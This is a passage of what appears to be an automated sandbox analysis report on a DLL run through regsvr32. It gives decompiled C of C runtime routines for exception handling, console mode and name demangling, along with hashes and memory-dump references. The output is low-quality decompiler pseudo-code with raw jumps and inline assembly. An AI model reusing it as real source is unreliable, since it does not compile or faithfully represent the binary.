                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value
                                                                                                              • String ID:
                                                                                                              • API String ID: 3702945584-0
                                                                                                              • Opcode ID: 943ee954952f5e9afd63ff5d22105c795a405d8fc1290ef55c5644839e7ae17b
                                                                                                              • Instruction ID: 5eca4f79ac6f91b7d550d33930d95a66e8fc04c410d53cc69df73fee5cb1baea
                                                                                                              • Opcode Fuzzy Hash: 943ee954952f5e9afd63ff5d22105c795a405d8fc1290ef55c5644839e7ae17b
                                                                                                              • Instruction Fuzzy Hash: CF11E13030064C45F9EBA7355452BFB1B416B9D3F4F6AC735B83A852D3DE29964D8305
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180010FA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 39%
                                                                                                              			E00000001180010FA0(void* __edx, intOrPtr* __rcx, void* __rdx, long long __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t93;
				intOrPtr _t94;
				intOrPtr _t123;
				void* _t134;
				intOrPtr _t135;
				signed long long _t141;
				long long _t143;
				long long _t148;
				void* _t149;
				intOrPtr* _t169;
				long long _t180;
				long long _t181;
				intOrPtr* _t182;
				void* _t183;
				intOrPtr* _t184;
				intOrPtr* _t185;
				void* _t186;
				signed long long _t187;
				intOrPtr _t195;
				void* _t202;
				long long _t203;

				_t185 = _t186 - 0x38;
				_t187 = _t186 - 0x138;
				_t141 =  *0x80070098; // 0xde2ac6aee6eb
				 *(_t185 + 0x28) = _t141 ^ _t187;
				_t183 = __r9;
				_t143 =  *((intOrPtr*)(_t185 + 0xb8));
				_t202 = __rdx;
				_t203 =  *((intOrPtr*)(_t185 + 0xa0));
				_t184 = __rcx;
				 *((long long*)(_t187 + 0x70)) = _t143;
				 *((long long*)(_t187 + 0x78)) = __r8;
				if ( *__rcx == 0x80000003) goto 0x80011269;
				E0000000118000E0F4(_t143);
				r12d =  *((intOrPtr*)(_t185 + 0xb0));
				r15d =  *((intOrPtr*)(_t185 + 0xa8));
				if ( *((long long*)(_t143 + 0x10)) == 0) goto 0x80011068;
				__imp__EncodePointer();
				_t158 = _t143;
				E0000000118000E0F4(_t143);
				if ( *((intOrPtr*)(_t143 + 0x10)) == _t143) goto 0x80011068;
				if ( *__rcx == 0xe0434f4d) goto 0x80011068;
				if ( *__rcx == 0xe0434352) goto 0x80011068;
				 *((intOrPtr*)(_t187 + 0x38)) = r15d;
				 *(_t187 + 0x30) =  *((intOrPtr*)(_t187 + 0x70));
				 *((intOrPtr*)(_t187 + 0x28)) = r12d;
				 *((long long*)(_t187 + 0x20)) = _t203;
				if (E0000000118000E52C(__rcx, __rdx,  *((intOrPtr*)(_t187 + 0x78)), __r9) != 0) goto 0x80011269;
				0x80011a88();
				if ( *_t185 <= 0) goto 0x80011289;
				 *((intOrPtr*)(_t187 + 0x28)) = r12d;
				 *((long long*)(_t187 + 0x20)) = _t203;
				r8d = r15d;
				_t93 = E0000000118000EB9C(_t143, _t185 - 0x70, _t185, __r9, __rcx, _t185);
				asm("movups xmm0, [ebp-0x70]");
				asm("movdqu [ebp-0x80], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t93 -  *((intOrPtr*)(_t185 - 0x58)) >= 0) goto 0x80011269;
				_t94 =  *((intOrPtr*)(_t185 - 0x78));
				 *((long long*)(_t187 + 0x68)) =  *((intOrPtr*)(_t185 - 0x70));
				 *((intOrPtr*)(_t187 + 0x60)) = _t94;
				asm("inc ecx");
				asm("dec ax");
				asm("movups [ebp-0x80], xmm0");
				if (_t94 - r15d > 0) goto 0x800111cf;
				_t134 = r15d - _t94;
				if (_t134 > 0) goto 0x800111cf;
				r9d =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x10))));
				0x800119e0();
				 *((long long*)(_t185 - 0x48)) =  *((intOrPtr*)(_t185 - 0x40));
				E000000011800122A4( *((intOrPtr*)(_t185 - 0x40)), _t185 - 0x50);
				_t148 =  *((intOrPtr*)(_t185 - 0x40));
				 *((long long*)(_t185 - 0x48)) = _t148;
				E000000011800122A4(_t148, _t185 - 0x50);
				if (_t134 == 0) goto 0x80011146;
				E000000011800122A4(_t148, _t185 - 0x50);
				if (_t134 != 0) goto 0x80011137;
				_t135 =  *((intOrPtr*)(_t185 - 0x30));
				if (_t135 == 0) goto 0x80011174;
				E0000000118000F1DC(_t148);
				_t149 = _t148 +  *((intOrPtr*)(_t185 - 0x30));
				if (_t135 == 0) goto 0x80011174;
				if (__edx == 0) goto 0x8001116c;
				E0000000118000F1DC(_t149);
				goto 0x8001116e;
				if ( *((char*)(_t149 +  *((intOrPtr*)(_t185 - 0x30)) + 0x10)) != 0) goto 0x800111c3;
				if (( *(_t185 - 0x34) & 0x00000040) != 0) goto 0x800111c3;
				 *((char*)(_t187 + 0x58)) = 0;
				_t169 = _t184;
				 *((char*)(_t187 + 0x50)) = 1;
				 *((long long*)(_t187 + 0x48)) =  *((intOrPtr*)(_t187 + 0x70));
				 *((intOrPtr*)(_t187 + 0x40)) = r12d;
				 *((long long*)(_t187 + 0x38)) = _t185 - 0x80;
				 *(_t187 + 0x30) =  *(_t187 + 0x30) & 0x00000000;
				 *((long long*)(_t187 + 0x28)) = _t185 - 0x38;
				 *((long long*)(_t187 + 0x20)) = _t203;
				E000000011800102F0(0, _t158 - 1, _t169, _t202,  *((intOrPtr*)(_t187 + 0x78)), _t183);
				_t195 =  *((intOrPtr*)(_t187 + 0x68));
				_t180 =  *((intOrPtr*)(_t195 + 8)) -  *((char*)(_t169 + 0x18005f7b0));
				 *((long long*)(_t195 + 8)) = _t180;
				 *(_t195 + 0x18) =  *(_t180 - 4) >>  *(_t169 + 0x18005f7c0);
				_t181 = _t180 -  *((char*)(_t169 + 0x18005f7b0));
				 *((long long*)(_t195 + 8)) = _t181;
				 *(_t195 + 0x1c) =  *(_t181 - 4) >>  *(_t169 + 0x18005f7c0);
				_t182 = _t181 -  *((char*)(_t169 + 0x18005f7b0));
				 *(_t195 + 0x20) =  *(_t182 - 4) >>  *(_t169 + 0x18005f7c0);
				 *((long long*)(_t195 + 8)) = _t182;
				 *((intOrPtr*)(_t195 + 0x24)) =  *_t182;
				_t123 =  *((intOrPtr*)(_t187 + 0x60)) + 1;
				 *((long long*)(_t195 + 8)) = _t182 + 4;
				 *((intOrPtr*)(_t187 + 0x60)) = _t123;
				if (_t123 -  *((intOrPtr*)(_t185 - 0x58)) < 0) goto 0x800110d1;
				return E000000011800028F0( *(_t182 - 4) >>  *(_t169 + 0x18005f7c0), _t123,  *(_t185 + 0x28) ^ _t187);
			}




























                                                                                                              0x180010fad
                                                                                                              0x180010fb2
                                                                                                              0x180010fb9
                                                                                                              0x180010fc3
                                                                                                              0x180010fcd
                                                                                                              0x180010fd0
                                                                                                              0x180010fd7
                                                                                                              0x180010fda
                                                                                                              0x180010fe1
                                                                                                              0x180010fe4
                                                                                                              0x180010fe9
                                                                                                              0x180010fee
                                                                                                              0x180010ff4
                                                                                                              0x180010ff9
                                                                                                              0x180011000
                                                                                                              0x18001100c
                                                                                                              0x180011010
                                                                                                              0x180011016
                                                                                                              0x180011019
                                                                                                              0x180011022
                                                                                                              0x18001102a
                                                                                                              0x180011032
                                                                                                              0x180011044
                                                                                                              0x18001104c
                                                                                                              0x180011051
                                                                                                              0x180011056
                                                                                                              0x180011062
                                                                                                              0x180011073
                                                                                                              0x18001107c
                                                                                                              0x180011082
                                                                                                              0x18001108e
                                                                                                              0x180011093
                                                                                                              0x18001109a
                                                                                                              0x18001109f
                                                                                                              0x1800110a3
                                                                                                              0x1800110a8
                                                                                                              0x1800110ad
                                                                                                              0x1800110b4
                                                                                                              0x1800110c5
                                                                                                              0x1800110c8
                                                                                                              0x1800110cd
                                                                                                              0x1800110d1
                                                                                                              0x1800110d6
                                                                                                              0x1800110db
                                                                                                              0x1800110e2
                                                                                                              0x1800110ec
                                                                                                              0x1800110ef
                                                                                                              0x180011105
                                                                                                              0x180011108
                                                                                                              0x180011115
                                                                                                              0x180011119
                                                                                                              0x18001111e
                                                                                                              0x180011129
                                                                                                              0x18001112d
                                                                                                              0x180011135
                                                                                                              0x18001113b
                                                                                                              0x180011144
                                                                                                              0x180011146
                                                                                                              0x18001114a
                                                                                                              0x18001114c
                                                                                                              0x180011155
                                                                                                              0x180011158
                                                                                                              0x18001115c
                                                                                                              0x18001115e
                                                                                                              0x18001116a
                                                                                                              0x180011172
                                                                                                              0x180011178
                                                                                                              0x18001118a
                                                                                                              0x18001118f
                                                                                                              0x180011192
                                                                                                              0x180011197
                                                                                                              0x1800111a0
                                                                                                              0x1800111a5
                                                                                                              0x1800111ae
                                                                                                              0x1800111b4
                                                                                                              0x1800111b9
                                                                                                              0x1800111be
                                                                                                              0x1800111c3
                                                                                                              0x1800111ea
                                                                                                              0x1800111f2
                                                                                                              0x1800111f6
                                                                                                              0x180011211
                                                                                                              0x180011219
                                                                                                              0x18001121d
                                                                                                              0x180011238
                                                                                                              0x180011240
                                                                                                              0x180011248
                                                                                                              0x18001124e
                                                                                                              0x180011256
                                                                                                              0x180011258
                                                                                                              0x18001125c
                                                                                                              0x180011263
                                                                                                              0x180011288

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                              • String ID: MOC$RCC
                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                              • Opcode ID: c862343d2316fa02c6cd54abf461de7ba6ee37518df320774ab49dddd1b5ab7a
                                                                                                              • Instruction ID: 177b2a468dea434123700bd4c63e3ee1dfb0b663efa80ec56a5987105249a0c7
                                                                                                              • Opcode Fuzzy Hash: c862343d2316fa02c6cd54abf461de7ba6ee37518df320774ab49dddd1b5ab7a
                                                                                                              • Instruction Fuzzy Hash: 34919073604B988AE796CB65E8403DD7BA0F349788F14811AFF8957B55DF38C299CB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180010D88 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 68%
                                                                                                              			E00000001180010D88(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0x80010e2c;
				E0000000118000E0F4(_t27);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x80010e47;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E0000000118000E0F4(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x80010e47;
				if ( *__rcx == 0xe0434f4d) goto 0x80010e47;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0x80010e4b;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E0000000118000E4D8(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0x80010e4b;
				return _t19;
			}















                                                                                                              0x180010d88
                                                                                                              0x180010d8b
                                                                                                              0x180010d8f
                                                                                                              0x180010d93
                                                                                                              0x180010da2
                                                                                                              0x180010da6
                                                                                                              0x180010dbc
                                                                                                              0x180010dbe
                                                                                                              0x180010dc3
                                                                                                              0x180010dd0
                                                                                                              0x180010dd4
                                                                                                              0x180010ddd
                                                                                                              0x180010de6
                                                                                                              0x180010def
                                                                                                              0x180010df8
                                                                                                              0x180010dfc
                                                                                                              0x180010e0c
                                                                                                              0x180010e14
                                                                                                              0x180010e19
                                                                                                              0x180010e1e
                                                                                                              0x180010e23
                                                                                                              0x180010e2a
                                                                                                              0x180010e46

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                              • String ID: MOC$RCC
                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                              • Opcode ID: 93c0c9c642dbb9b1de9c6eb21a21f3404a6d68ae2ac55aadb2f15b85174284d9
                                                                                                              • Instruction ID: a6c6258460330bd3c0a9a2859f94450e93e037db9bf0b140d91fcd2b671c1667
                                                                                                              • Opcode Fuzzy Hash: 93c0c9c642dbb9b1de9c6eb21a21f3404a6d68ae2ac55aadb2f15b85174284d9
                                                                                                              • Instruction Fuzzy Hash: 86513737604B888AE762DF65D0803DD77A0F349BC8F248515EF8957B98DB78D299C700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180011514 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 45%
                                                                                                              			E00000001180011514(void* __ecx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				signed int _t59;
				signed int _t100;
				void* _t108;
				intOrPtr _t110;
				signed int* _t115;
				intOrPtr* _t135;
				void* _t138;
				void* _t141;
				void* _t143;
				void* _t157;
				void* _t158;

				_t108 = _t143;
				 *((long long*)(_t108 + 8)) = __rbx;
				 *((long long*)(_t108 + 0x10)) = __rbp;
				 *((long long*)(_t108 + 0x18)) = __rsi;
				 *((long long*)(_t108 + 0x20)) = __rdi;
				_t135 = __rcx;
				_t138 = __r9;
				_t158 = __r8;
				_t141 = __rdx;
				E0000000118000525C(_t55, __r8);
				E0000000118000E0F4(_t108);
				_t115 = _a40;
				if ( *((intOrPtr*)(_t108 + 0x40)) != 0) goto 0x80011596;
				if ( *__rcx == 0xe06d7363) goto 0x80011596;
				if ( *__rcx != 0x80000029) goto 0x8001157a;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x8001157e;
				goto 0x8001157c;
				if ( *__rcx == 0x80000026) goto 0x80011596;
				_t59 =  *_t115 & 0x1fffffff;
				if (_t59 - 0x19930522 < 0) goto 0x80011596;
				if ((_t115[9] & 0x00000001) != 0) goto 0x80011725;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x8001162e;
				if (_t115[1] == 0) goto 0x80011725;
				if (_a48 != 0) goto 0x80011725;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x8001161b;
				if ( *__rcx != 0x80000026) goto 0x800115f9;
				0x8000fb28(_t157);
				if (_t59 - 0xffffffff < 0) goto 0x80011745;
				if (_t59 - _t115[1] >= 0) goto 0x80011745;
				r9d = _t59;
				E000000011800124E4(_t108, _t141, __r9, _t115);
				goto 0x80011725;
				if ( *_t135 != 0x80000029) goto 0x8001161b;
				r9d =  *(_t135 + 0x38);
				if (r9d - 0xffffffff < 0) goto 0x80011745;
				if (r9d - _t115[1] >= 0) goto 0x80011745;
				goto 0x800115e9;
				E0000000118000E8D4(r9d - _t115[1], _t108, _t115, __r9, __r9, _t115);
				goto 0x80011725;
				if (_t115[3] != 0) goto 0x80011676;
				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80011656;
				_t100 = _t115[8];
				if (_t100 == 0) goto 0x80011656;
				E0000000118000F1DC(_t108);
				if (_t100 != 0) goto 0x80011676;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80011725;
				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80011725;
				if ( *_t135 != 0xe06d7363) goto 0x800116ec;
				if ( *((intOrPtr*)(_t135 + 0x18)) - 3 < 0) goto 0x800116ec;
				if ( *((intOrPtr*)(_t135 + 0x20)) - 0x19930522 <= 0) goto 0x800116ec;
				_t110 =  *((intOrPtr*)(_t135 + 0x30));
				if ( *((intOrPtr*)(_t110 + 8)) == 0) goto 0x800116ec;
				E0000000118000F1F0(_t110);
				if (_t110 +  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x30)) + 8)) == 0) goto 0x800116ec;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t115;
				 *0x8005d348();
				goto 0x8001172a;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t115;
				E000000011800103C4(_a48, 0x80000026, _t135, _t141, _t158, _t138, _t110 +  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x30)) + 8)));
				return 1;
			}



















                                                                                                              0x180011514
                                                                                                              0x180011517
                                                                                                              0x18001151b
                                                                                                              0x18001151f
                                                                                                              0x180011523
                                                                                                              0x18001152d
                                                                                                              0x180011530
                                                                                                              0x180011536
                                                                                                              0x180011539
                                                                                                              0x18001153c
                                                                                                              0x180011541
                                                                                                              0x180011546
                                                                                                              0x18001155c
                                                                                                              0x180011564
                                                                                                              0x180011568
                                                                                                              0x18001156e
                                                                                                              0x180011578
                                                                                                              0x18001157c
                                                                                                              0x180011580
                                                                                                              0x18001158a
                                                                                                              0x180011590
                                                                                                              0x18001159a
                                                                                                              0x1800115a4
                                                                                                              0x1800115b2
                                                                                                              0x1800115bc
                                                                                                              0x1800115c0
                                                                                                              0x1800115cc
                                                                                                              0x1800115d4
                                                                                                              0x1800115dd
                                                                                                              0x1800115e3
                                                                                                              0x1800115ef
                                                                                                              0x1800115f4
                                                                                                              0x1800115fb
                                                                                                              0x1800115fd
                                                                                                              0x180011605
                                                                                                              0x18001160f
                                                                                                              0x180011619
                                                                                                              0x180011624
                                                                                                              0x180011629
                                                                                                              0x180011632
                                                                                                              0x180011640
                                                                                                              0x180011642
                                                                                                              0x180011646
                                                                                                              0x180011648
                                                                                                              0x180011654
                                                                                                              0x180011662
                                                                                                              0x180011670
                                                                                                              0x18001167c
                                                                                                              0x180011682
                                                                                                              0x18001168b
                                                                                                              0x18001168d
                                                                                                              0x180011695
                                                                                                              0x180011697
                                                                                                              0x1800116aa
                                                                                                              0x1800116b7
                                                                                                              0x1800116c9
                                                                                                              0x1800116d8
                                                                                                              0x1800116df
                                                                                                              0x1800116e4
                                                                                                              0x1800116ea
                                                                                                              0x1800116f7
                                                                                                              0x180011709
                                                                                                              0x180011717
                                                                                                              0x18001171b
                                                                                                              0x180011720
                                                                                                              0x180011744

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                              • String ID: csm$csm
                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                              • Opcode ID: a1d44945871e1f0e730c32dde90860bcfa3aea57d1cd090b738d4b87d6dc0a93
                                                                                                              • Instruction ID: 10efbe0da98848f7cb1ac039a4d60ff939f9beb912c3c8be4bdd1aadd2a3d43d
                                                                                                              • Opcode Fuzzy Hash: a1d44945871e1f0e730c32dde90860bcfa3aea57d1cd090b738d4b87d6dc0a93
                                                                                                              • Instruction Fuzzy Hash: 0B51B036104A88CAEBBA8F11D5443D977A1F398BCAF18C116FA9947BD5CF38C659CB01
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180054464 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetConsoleMode.KERNEL32 ref: 0000000180054587
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,0000000180015306,?,?,0000000180015306,0000000180015306,?,0000000180015306,0000000180015306,0000000180054404), ref: 0000000180054611
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 953036326-0
                                                                                                              • Opcode ID: dd4238a744b076b781d05cf1bed0a567a77e5719ff240a80b4666a7aa2b64be0
                                                                                                              • Instruction ID: c6c4e24da5a2169f6bb37e38d57bc38e83a02099aa0772d5310a27277e0d6893
                                                                                                              • Opcode Fuzzy Hash: dd4238a744b076b781d05cf1bed0a567a77e5719ff240a80b4666a7aa2b64be0
                                                                                                              • Instruction Fuzzy Hash: 6591C273710A588AFBA2CB6594807ED27A0F34D7DCF448106FE0A6B695DF36C649C711
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180008E04 Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 32%
                                                                                                              			E00000001180008E04(void* __eflags, void* __rax, long long __rbx, signed long long* __rcx, void* __rdx, long long __rsi, void* __r8, long long __r12, long long _a8, long long _a16, long long _a24) {
				void* _v24;
				char _v56;
				void* _v72;
				signed int _v80;
				signed long long _v88;
				signed long long _v96;
				long long _v104;
				signed int _v112;
				char _v120;
				signed int _t70;
				void* _t80;
				void* _t81;
				void* _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				signed long long _t101;
				intOrPtr* _t121;
				intOrPtr* _t122;
				long long _t124;
				long long _t125;
				signed char* _t126;
				intOrPtr* _t127;
				intOrPtr* _t129;
				char* _t130;
				signed long long* _t134;
				void* _t150;
				long long _t158;
				signed long long _t173;
				long long _t175;

				_t171 = __r12;
				_t165 = __r8;
				_t159 = __rsi;
				_t150 = __rdx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __r12;
				_t134 = __rcx;
				 *0x8007132c =  *0x8007132c + 1;
				_t70 =  *0x80071318; // 0x0
				asm("bt eax, 0xd");
				if (__eflags >= 0) goto 0x80008e66;
				asm("btr eax, 0xd");
				 *0x80071318 = _t70;
				E00000001180008CF0(__rcx,  &_v104, __r8);
				asm("bts dword [0x684c4], 0xd");
				 *_t134 = _v104;
				_t134[1] = _v96;
				goto 0x800090c2;
				_t121 =  *0x80071308; // 0x0
				if ( *_t121 != 0x3f) goto 0x800090a6;
				_t122 = _t121 + 1;
				 *0x80071308 = _t122;
				if ( *_t122 != 0x3f) goto 0x80008ed6;
				if ( *((intOrPtr*)(_t122 + 1)) != 0x3f) goto 0x80008eb1;
				E00000001180008E04( *((intOrPtr*)(_t122 + 1)) - 0x3f, _t122 + 1, _t134,  &_v104, _t150, __rsi, _t165, __r12);
				_t124 =  *0x80071308; // 0x0
				goto 0x80008eaa;
				_t125 = _t124 + 1;
				 *0x80071308 = _t125;
				if ( *_t125 != 0) goto 0x80008ea0;
				goto 0x80008e54;
				if ( *_t125 != 0x24) goto 0x80008ec3;
				E0000000118000C268(_t81,  *_t121, 1, _t90, _t134,  &_v120, _t150, _t158, _t159);
				goto 0x80008ee4;
				 *0x80071308 = _t125;
				r8d = 0;
				E0000000118000A220( *_t121, 0, _t134,  &_v120, _t158, _t159, _t165, _t171);
				goto 0x80008ee4;
				r8d = 0;
				0x8000d698();
				_t91 = _v112;
				_t173 = _v120;
				_t101 = _t173;
				if (_t101 == 0) goto 0x80008efe;
				asm("bt esi, 0x9");
				if (_t101 >= 0) goto 0x80008efe;
				r12d = 1;
				goto 0x80008f01;
				r12d = 0;
				r15d = _t91;
				r15d = r15d >> 0xf;
				r15d = r15d & 0x00000001;
				if (_v112 - 1 <= 0) goto 0x80008f1d;
				 *_t134 = _t173;
				_t134[1] = _t91;
				goto 0x800090c2;
				_t126 =  *0x80071308; // 0x0
				if (( *_t126 & 0x000000bf) == 0) goto 0x80009010;
				E0000000118000B5B8(_t134,  &_v104, _t158, _t159, _t171);
				if (_v104 == 0) goto 0x80009010;
				if ( *0x8007131c == 0) goto 0x80008fc7;
				 *0x8007131c = 0;
				0x80005f48();
				_v120 =  *_t126;
				_v112 = _t126[8];
				_t127 =  *0x80071308; // 0x0
				if ( *_t127 == 0x40) goto 0x80009010;
				E0000000118000B5B8(_t134,  &_v88, _t158, _t159, _t171);
				_v104 =  *_t127;
				_v96 =  *(_t127 + 8);
				_v88 = "::";
				_v80 = 2;
				asm("movaps xmm0, [ebp-0x40]");
				asm("movdqa [ebp-0x40], xmm0");
				0x80005f1c();
				goto 0x80008ff7;
				_t129 = "::";
				_v88 = _t129;
				_v80 = 2;
				asm("movaps xmm0, [ebp-0x40]");
				asm("movdqa [ebp-0x40], xmm0");
				0x80005f1c();
				0x80005f48();
				_t93 =  *(_t129 + 8);
				_t175 =  *_t129;
				_v112 = _t93;
				_v120 = _t175;
				if (r12d == 0) goto 0x80009021;
				if (_t175 == 0) goto 0x80009021;
				asm("bts esi, 0x9");
				_v112 = _t93;
				if (r15d == 0) goto 0x80009030;
				_t94 = _t93 | 0x00008000;
				_v112 = _t94;
				if (_t175 == 0) goto 0x80008f12;
				if ((0x00001000 & _t94) != 0) goto 0x80008f12;
				_t130 =  *0x80071308; // 0x0
				if ( *_t130 == 0) goto 0x8000906c;
				if ( *_t130 == 0x40) goto 0x80009065;
				_t134[1] = _t134[1] & 0x00000000;
				_t134[1] = 2;
				 *_t134 =  *_t134 & 0x00000000;
				goto 0x800090c2;
				 *0x80071308 =  *0x80071308 + 1;
				if (( *0x80071318 & 0x00001000) == 0) goto 0x80009098;
				if (r12d != 0) goto 0x80009098;
				if ((0x00008000 & _t94) != 0) goto 0x80009098;
				_v88 = _v88 & 0x00000000;
				_v80 = _v80 & r12d;
				E000000011800063E0(_t134,  &_v56,  &_v88);
				goto 0x80008f12;
				_t80 = E000000011800063E0(_t134, _t134,  &_v120);
				goto 0x800090c2;
				 *_t134 =  *_t134 & 0x00000000;
				_t134[1] = _t134[1] & 0x00000000;
